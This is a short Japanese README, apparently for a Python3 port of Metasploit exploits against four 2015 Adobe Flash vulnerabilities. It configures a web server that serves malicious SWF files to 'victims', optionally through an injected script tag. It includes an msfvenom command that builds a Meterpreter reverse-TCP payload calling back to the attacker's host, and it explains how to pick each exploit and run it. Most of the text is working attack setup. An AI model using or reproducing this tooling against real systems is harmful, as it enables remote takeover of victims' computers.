
Metasploitのエクスプロイトを、Adobe Flashの脆弱性CVE-2015-3090、CVE-2015-3105、CVE-2015-5119、CVE-2015-5122向けにPython3スクリプトに変換しました。
Adobe Flash の脆弱性 CVE-2015-3090、CVE-2015-3105、CVE-2015-5119、および CVE-2015-5122 に対する Metasploit エクスプロイトを Python3 スクリプトに変換しました。
このスクリプトは、以下の Adobe Flash 脆弱性のいずれかを一度に悪用できる Web サーバーをホストします。
必要に応じて、exploit.py を変更する必要があります(ここで説明)。
hostname = "192.168.1.100"
serverPort = 8080
xss = False
True に設定すると、被害者からの最初のリクエストは JavaScript として扱われます:
<script src="http://192.168.1.100:8080/"></script>False に設定すると、被害者からの最初のリクエストは HTML として扱われます:
http://192.168.1.100:8080/base64Payload = "..."
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 | base64注意: 私が動作を確認した唯一のペイロードは
windows/meterpreter/reverse_tcpです。
swfFile = swfFileList['37368']
swfFileList = {
'37368': 'CVE-2015-3090.swf',
'37448': 'CVE-2015-3105.swf',
'37523': 'CVE-2015-5119.swf',
'37599': 'CVE-2015-5122.swf'
}
悪意のある swf ファイルと同じディレクトリで以下のコマンドを実行して、Adobe Flash エクスプロイトスクリプトを実行します:
python3 exploit.pyCVE-2015-3090 -> https://exploit-db.com/exploits/37368
CVE-2015-3105 -> https://exploit-db.com/exploits/37448
CVE-2015-5119 -> https://exploit-db.com/exploits/37523
CVE-2015-5122 -> https://exploit-db.com/exploits/37599